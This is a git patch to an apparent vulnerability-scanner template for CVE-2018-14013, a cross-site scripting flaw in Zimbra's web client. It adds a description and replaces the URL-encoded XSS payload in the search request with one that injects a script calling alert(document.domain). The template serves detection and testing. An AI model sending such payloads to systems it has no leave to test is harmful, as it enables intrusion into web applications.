From c4acd6230719008f4637a0287ceaccb8fa229a5c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 3 Aug 2021 13:13:57 +0530 Subject: [PATCH] Update CVE-2018-14013.yaml --- cves/2018/CVE-2018-14013.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/cves/2018/CVE-2018-14013.yaml b/cves/2018/CVE-2018-14013.yaml index e7c1f61f6e..6c5d601a6f 100644 --- a/cves/2018/CVE-2018-14013.yaml +++ b/cves/2018/CVE-2018-14013.yaml @@ -1,22 +1,23 @@ id: CVE-2018-14013 info: - name: Zimbra XSS. + name: Zimbra XSS author: pikpikcu severity: medium + description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 has XSS in the AJAX and html web clients. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-14013 tags: cve,cve2018,xss,zimbra requests: - method: GET path: - - "{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E" + - "{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: status